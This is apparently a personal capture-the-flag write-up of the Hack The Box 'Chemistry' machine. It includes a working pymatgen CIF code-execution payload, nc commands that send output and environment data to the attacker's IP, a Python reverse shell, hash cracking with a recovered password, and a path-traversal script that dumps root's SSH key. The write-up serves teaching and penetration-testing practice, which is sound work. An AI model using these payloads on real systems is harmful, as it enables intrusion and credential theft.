Chemistry
2024-10-24
INTRODUCTION
Chemistry was released as the penultimate box of HTB’s season 6, Heist. It’s about breaking into a custom service for analyzing a scientific data file. Maybe you’ve seen tools like this before, where some expert in a non-tech field knows just enough coding to solve a problem for themselves? It’s admirable that people do this type of thing, but these tools are often doomed by poor security - as we’ll see in this box.
Foothold is 99% of Chemistry. Unless you’re incredibly clever, it requires a little bit of research to discover a particular vulnerability disclosure, and utilize the PoC that the disclosure provides. The exploit from the PoC is quite limited, however, and will require careful usage to actually gain us a shell. Thankfully, if you build up to your foothold in a series of small steps, it should be relatively easy.
Unlike many “Easy” boxes, there is actually a small escalation from the service account that you use for foothold, to a low-privilege human user. Some very simple local enumeration will uncover a database, and inside are hashes that are trivial to crack - one of them leads to the next user
Privilege escalation to root is… almost not even worth mentioning 😂 Just look through the filesystem for a suspicious script and run it.
RECON
nmap scans
Port scan
For this box, I’m running my typical enumeration strategy. I set up a directory for the box, with a nmap
subdirectory. Then set $RADDR
to the target machine’s IP, and scanned it with a simple but broad port scan:
sudo nmap -p- -O --min-rate 1000 -oN nmap/port-scan-tcp.txt $RADDR
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
No web server, eh? That’s interesting!
Script scan
To investigate a little further, I ran a script scan over the TCP ports I just found:
TCPPORTS=`grep "^[0-9]\+/tcp" nmap/port-scan-tcp.txt | sed 's/^\([0-9]\+\)\/tcp.*/\1/g' | tr '\n' ',' | sed 's/,$//g'`
sudo nmap -sV -sC -n -Pn -p$TCPPORTS -oN nmap/script-scan-tcp.txt $RADDR
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.3 Python/3.9.5
| Date: Thu, 24 Oct 2024 04:38:29 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 719
| Vary: Cookie
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Chemistry - Home</title>
| <link rel="stylesheet" href="/static/styles.css">
| </head>
| <body>
| <div class="container">
| class="title">Chemistry CIF Analyzer</h1>
| <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
| <div class="buttons">
| <center><a href="/login" class="btn">Login</a>
| href="/register" class="btn">Register</a></center>
| </div>
| </div>
| </body>
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
Vuln scan
Now that we know what services might be running, I’ll do a vulnerability scan:
sudo nmap -n -Pn -p$TCPPORTS -oN nmap/vuln-scan-tcp.txt --script 'safe and vuln' $RADDR
No additional info from the vuln scan
UDP scan
To be thorough, I also did a scan over the common UDP ports:
sudo nmap -sUV -T4 -F --version-intensity 0 -oN nmap/port-scan-udp.txt $RADDR
No results from the UDP scan
Webserver Strategy
Nmap didn’t show any redirect for port 5000
, but for convenience I’ll add an entry /etc/hosts and do banner grabbing on that domain:
DOMAIN=chemistry.htb
echo "$RADDR $DOMAIN" | sudo tee -a /etc/hosts
whatweb --aggression 3 http://$DOMAIN:5000 && curl -IL http://$RADDR:5000
That’s a slightly old version of Python, but a current version of Werkzeug.
Next I’ll perform vhost and subdomain enumeration. First, I’ll check for alternate hosts:
WLIST="/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt"
ffuf -w $WLIST -u http://$RADDR/ -H "Host: FUZZ.htb" -c -t 60 -o fuzzing/vhost-root.md -of md -timeout 4 -ic -ac -v
None were found. But frankly, we weren’t expecting any against a Python + Werkzeug ( + Flask probably) webserver; they don’t usually define vhosts.
Next I’ll check for subdomains of chemistry.htb
:
ffuf -w $WLIST -u http://$RADDR/ -H "Host: FUZZ.$DOMAIN" -c -t 60 -o fuzzing/vhost-$DOMAIN.md -of md -timeout 4 -ic -ac -v
No new results from that. I’ll move on to directory enumeration on http://chemistry.htb:5000
.
First, directory enumeration:
I prefer to not run a recursive scan, so that it doesn’t get hung up on enumerating CSS and images.
WLIST=/usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
ffuf -w $WLIST:FUZZ -u http://$DOMAIN:5000/FUZZ -t 60 -ic -c -o fuzzing/ffuf-directories-root -of json -timeout 4
Uzing ZAP to quickly spider the site, we achieve results that also indicate the POST
parameters:
Exploring the Website
The landing page is very simple, allowing us only to register or login. After a login, we should be redirected to the Dashboard
To try it out, I’ll register a user:
The Dashboard allows us to upload .CIF
files. Thankfully, they provide an example file at /static/example.cif
:
Downloading the example file, we can see that it’s there’s basically no file metadata, just some stuff that probably gets parsed in Python. Notably, they’re using a custom Content-Type
header:
HTTP/1.1 200 OK
Server: Werkzeug/3.0.3 Python/3.9.5
Date: Thu, 24 Oct 2024 05:43:11 GMT
Content-Disposition: inline; filename=example.cif
Content-Type: chemical/x-cif
Content-Length: 376
Last-Modified: Wed, 09 Oct 2024 20:13:53 GMT
Cache-Control: no-cache
ETag: "1728504833.9929953-376-2511866491"
Date: Thu, 24 Oct 2024 05:43:11 GMT
Connection: close
data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
After uploading the example.cif
file, we can see an entry on the dashboard. It has uploaded to a file with a random filename, but the entry on the dashboard shows the filename we provided:
When we view the structure from example.cif
that we just uploaded, we can see a couple of calculated values, volume and density. It’s probably a fair assumption that volume is simply a * b * c
, but density
looks more complicated:
☝️ Regardless of how they’re calculated, what’s important is that we have calculated values that are being rendered based on user-controllable inputs.
So far, I see a few things we might be able to attack:
- The filename. We might be able to do a stored XSS via this parameter, but it’s unclear if that would gain us anything.
- The calculated values Volume and Density: maybe we can find a way to sneak code into one of the user-controllable parameters, and gain RCE this way?
FOOTHOLD
Playing with the CIF File
At first, I tried to execute python code written into the variables of the CIF file. I placed simple statements into all kinds of different positions of the CIF file, very similar to how you’d test for SSTI…
My only findings were that I could use arbitrary text for the elements in the _atom_site_occupancy
data, and that portions of the string would be reflected onto the page. We can change the dimensions of the crystal, but can’t seem to inject commands into those values.
In hopes of traversing the imported modules within the server’s python instance, I tried these payloads in various positions, too. If any of these were successful, we could build somewhat of a “gadget chain” in hopes of accessing something useful like os
or subprocess
:
[].class.base.subclasses()
''.class.mro()[1].subclasses()
''.__class__.__mro__[2].__subclasses__()
self.__init__.__globals__.__builtins__
No luck with any of those!
Vulnerability Research
🔍 Since my attempts at injecting code into the CIF file were unsuccessful, I started some web searching for known vulnerabilities in this file format. Eventually, I found this security advisory in the https://github.com/materialsproject/pymatgen Github repo, which documents a PoC for exploiting the parser for this file format:
data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch pwned");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
The PoC executes a simple touch pwned
command.
Testing the PoC
Clearly, this is a blind attack - there is no reflected info to the website. Therefore, to test if it works, I’ll use a payload that doesn’t rely on reflected values:
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("sleep 3");0,0,0'
I also did this with sleep 1
, uploading two files.
It seems like, when I View each of the files, the sleep
command actually executes. Here are the two requests to view each file:
We can see that they take 0.19s plus whatever sleep delay was added!
Extend the PoC
Since this foothold will be blind, it might be useful to know whether or not cURL
is on the target. Let’s check, using this payload:
I started up an instance of my typical HTTP server on port 8000. Check it out at my github repo if you want to use it too. I’m using it here because it’ll automatically convert base64 data, and because it lives after more than one connection.
I’ve also opened up port 8000 using
ufw
.
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("curl http://10.10.14.17:8000/success");0,0,0'
I was having a lot of trouble getting any subshells to work within the payload, so I checked what was available using which
combined with nc
:
which nc curl wget base64 sh bash ash python python3 | nc 10.10.14.17 53
Aha! So base64
and bash
are not even on the target. That explains the failure of several of my attempts to exfiltrate any data…
Regardless, I’m not having any luck at all forming a reverse shell. Maybe I’ll try to learn more about the target, using this nc
channel that has proven reliable.
Let’s do some basic enumeration:
id | nc 10.10.14.17 53
# uid=1001(app) gid=1001(app) groups=1001(app)
⚠️ Through a little bit of testing, I’m finding that it doesn’t work with subshells. Pipes seem to work perfectly fine though.
Alright, that makes sense. Let’s see if we can read env
as a file:
nc 10.10.14.17 53 < /proc/self/env
# LANG=en_US.UTF-8PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binHOME=/home/appLOGNAME=appUSER=appSHELL=/bin/bashINVOCATION_ID=24986dcd0cb74fbdbd9049da93c48384JOURNAL_STREAM=9:38060WERKZEUG_SERVER_FD=4
Ohh interesting - this user has a home directory. Let’s list the contents:
ls -laR /home/app nc 10.10.14.17 53
This produced a lot of results, but here are the notable parts:
USER FLAG
Planting an SSH Key
🚫 This didn’t actually work. I’m still not quite sure why. If you’re short on time, skip ahead to the next section.
Since we know the app
user has a home directory, maybe we can simply plant an SSH key to get a shell? First, I’ll need to generate a keypair:
ssh-keygen -t rsa -b 4096 -f app_id_rsa -N "p3lican"
cp app_id_rsa.pub ../www # Copy the pubkey over to the directory our http server is serving
Now let’s attempt to make an SSH directory and plant the pubkey. Here are the payloads:
mkdir /home/app/.ssh
curl http://10.10.14.17:8000/app_id_rsa.pub -o /home/app/.ssh/id_rsa.pub
I ran an extra payload to check that the pubkey landed where it should have (it did), so now we’re ready to connect over SSH:
ssh -i ./app_id_rsa app@$RADDR
Huh? Why isn’t it accepting key-based authentication? Is it explicitly disabled or something? The permissions on both files of the keypair are correct.
Oh well, may as well try something else… 😔
Python Reverse Shell
Since we’ve already demonstrated we can write files using cURL
, and that python3
is present on the target, why not simply download a python script and run it as a reverse shell?
My attempts to form a python reverse shell didn’t work (using the payload from earlier). But those attempts were subject to whatever limitations the exploit had - and we already know that it didn’t accomodate subshells. Maybe we’ll have better luck running the reverse shell as a script?
First, I’ll prepare revshell.py
in my www
directory, the directory that my http
server is serving:
#!/usr/bin/python3
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.17",53))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("sh")
Next I’ll start up a reverse shell listener:
sudo ufw allow from $RADDR to any port 53 proto tcp
bash
sudo su
rlwrap nc -lvnp 53
Now I’ll prepare another two .cif
files - one with a payload to download the reverse shell, and another with a payload to run it:
curl http://10.10.14.17:8000/revshell.py -o /home/app/revshell.py
python3 /home/app/revshell.py
Running both of those, we finally see a reverse shell open:
database.db
Now that we have a stable reverse shell, and don’t need to worry about the limitations of the exploit, let’s exfil that database we found:
Now, from the attacker host, we can open it up and see what we’ve found:
SQLite version 3.46.0 2024-05-23 13:25:27
Enter ".help" for usage hints.
sqlite> .schema
CREATE TABLE structure (
id INTEGER NOT NULL,
user_id INTEGER NOT NULL,
filename VARCHAR(150) NOT NULL,
identifier VARCHAR(100) NOT NULL,
PRIMARY KEY (id),
FOREIGN KEY(user_id) REFERENCES user (id),
UNIQUE (identifier)
);
CREATE TABLE user (
id INTEGER NOT NULL,
username VARCHAR(150) NOT NULL,
password VARCHAR(150) NOT NULL,
PRIMARY KEY (id),
UNIQUE (username)
);
The user
table looks like it has password hashes. I’ll put them in a nice format and extract them:
.mode csv
.separator :
select username,password from user;
Lucky us - those look like MD5 hashes! They should be trivial to crack 👍
The list of users also contains rosa, who is the other user with a home directory on this box.
Password Cracking
I’ve copy-pasted those hashes (with the usernames) into database.hash
. Under the assumption that they’re regular MD5 hashes, I’ll run hashcat over them:
hashcat -m 0 --username database.hash /usr/share/wordlists/rockyou.txt
Seconds later, we have several results - including rosa:
The important credential is rosa : unicorniorosados
. With any luck, this password will have been re-used for the local rosa account:
ssh rosa@$RADDR # unicorniorosados
Excellent - we now have an SSH connection as rosa. The user flag is in /home/rosa
, so go read it for some points:
cat /home/rosa/user.txt
ROOT FLAG
Local Enumeration - rosa
A quick check to netstat
shows there is another listening process, listening locally on port 8080
:
Cross-referencing this with ps aux
, we can be reasonably sure that this is the process running from /opt/monitoring_site/app.py
:
root
is running the server, and only root
can access that directory. Let’s forward the port and check it out.
Since I already have an SSH connection, the easiest way to forward the port is simply using
SSH -L
ssh -L 8080:localhost:8080 rosa@$RADDR
Now we should be able to access that port on localhost
:
Monitoring Site
🚫 This section didn’t lead towards privilege escalation. If you’re short on time, skip to the next section.
Checking out the site
The monitoring site looks like it was made quite hastily, possibly hinting that this is something we should attack? The Start Service, Stop Service, and Check Attacks buttons in the navbar seem like they’re unimplemented - clicking any of them shows a message that the feature is not available.
The graphs on the Home page are completely static, so the only functionality that is actually implemented here is under List Services. Here’s the javascript connected to that button:
$('#list-services').click(function() {
$('.container > div').hide();
$('#service-list').show();
$('#attack-logs').hide();
// Get list of services
$('.loader').show();
$.get('/list_services', function(data) {
$('.loader').hide();
var runningServices = [];
var stoppedServices = [];
// Separate running and stopped services
// ...
// Show running services
// ...
// Show stopped services
// ...
});
});
In short, it makes GET
request to /list_services
, then parses the results. Here’s what that endpoint looks like:
That’s interesting, but I don’t really see anything out of the ordinary.
Enumerating the API
Since there are unimplemented features in the frontend, there’s a possibility that the developer created the backend first and just hasn’t got around to finishing the frontend. We already know about GET /list_services
; are there more?
Thankfully, Seclists has a good wordlist for enumerating APIs:
WLIST=/usr/share/seclists/Discovery/Web-Content/api/api-endpoints-res.txt
ffuf -w $WLIST:FUZZ -u http://localhost:8080/FUZZ -t 60 -ic -c -timeout 4 -mc all -fc 404
ffuf -w $WLIST:FUZZ -u http://localhost:8080/FUZZ -X POST -t 60 -ic -c -timeout 4 -mc all -fc 404
There weren’t any significant results. If I get stuck, I might return to enumerating the API more - for now, I’ll move on to something else.
Continuing local enumeration
As I was downloading my toolbox into /tmp
(to get a copy of pspy
), I noticed something very odd sitting there:
The contents of expl.sh
:
#!/bin/bash
url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/.ssh/id_rsa" # without the first /
for ((i=0; i<15; i++)); do
payload+="$string"
echo "[+] Testing with $payload$file"
status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
echo -e "\tStatus code --> $status_code"
if [[ $status_code -eq 200 ]]; then
curl -s --path-as-is "$url$payload$file"
break
fi
done
😏 Rosa… what have you been up to?
The above script is a pre-written exploit for the monitoring_site
server. It applies a very simple path traversal to obtain the id_rsa
key for root
.
So what are we waiting for? Let’s run it!
😂 Yep, that’s right - rosa has been doing their own privesc work. Lucky us, eh? The script works flawlessly and dumps the SSH private key for root.
All we need to do is paste it into a file and fix the permissions on it:
vim loot/root_id_rsa # [paste the key]
chmod 600 loot/root_id_rsa
ssh -i loot/root_id_rsa root@$RADDR
cat /root/root.txt
Wow - privesc was ridiculously easy!
CLEANUP
Target
I’ll get rid of the spot where I place my tools, /tmp/.Tools
:
rm -rf /tmp/.Tools
Attacker
There’s also a little cleanup to do on my local / attacker machine. It’s a good idea to get rid of any “loot” and source code I collected that didn’t end up being useful, just to save disk space:
rm loot/database.db
It’s also good policy to get rid of any extraneous firewall rules I may have defined. This one-liner just deletes all the ufw
rules:
NUM_RULES=$(($(sudo ufw status numbered | wc -l)-5)); for (( i=0; i<$NUM_RULES; i++ )); do sudo ufw --force delete 1; done; sudo ufw status numbered;
LESSONS LEARNED

Attacker
🗺️ Don’t get too fixated on a certain route to RCE. On this box, I feel like I wasted a lot of time during foothold trying to test and understand the limitations of the
CIF
file exploit. If I could go back and do it again, I would have adjusted my approach as soon as I found a single working command likenc
.👣 Related to the above point, break your ideas up into small, testable steps. In the end, it will save a lot of time because you won’t be checking and re-checking your assumptions over and over. Form a hypothesis, figure out a way to test it, prove it to yourself, then add it to your big bag of knowledge and keep moving forward.

Defender
💉 Beware niche libraries that might not practice secure coding. I’m sure the creators of the
.CIF
file interaction libraries were exceptionally good scientists, but nobody is an expert in everything… They followed very sloppy coding practices, using aneval()
call to parse user-controllable inputs, leading to our ability to inject commands. The lesson here is mostly to monitor the health of open-source projects: for maximum security, we need active contribution from a good balance between people, of a wide variety of skillsets.#️⃣ Hash passwords properly. Give some consideration to password hashing. In the end, the best password hashing balances the ease of legitimate password verification and difficulty of illicit password cracking. This box used unsalted
MD5
for hashing passwords, which is laughably easy to crack (you can even just toss them into Crackstation.net). Better modern approaches would have been using bcrypt (with sufficient difficulty), or using **PBKDF2 with HMAC-SHA-512 **(also with sufficient difficulty). Check out the guidlines by OWASP for more info.✋ Permissions are only as useful as the most permissive thing a service has access to. On this box, we escalated privilege by using a very simple path traversal - so why was the
monitoring_site
able to access root’s SSH key? This server should have been run as a service account, with limited permissions. Heck, even rosa had sufficient permissions to list the running services (service --status-all
), so why was it granted root?
Thanks for reading
🤝🤝🤝🤝
@4wayhandshake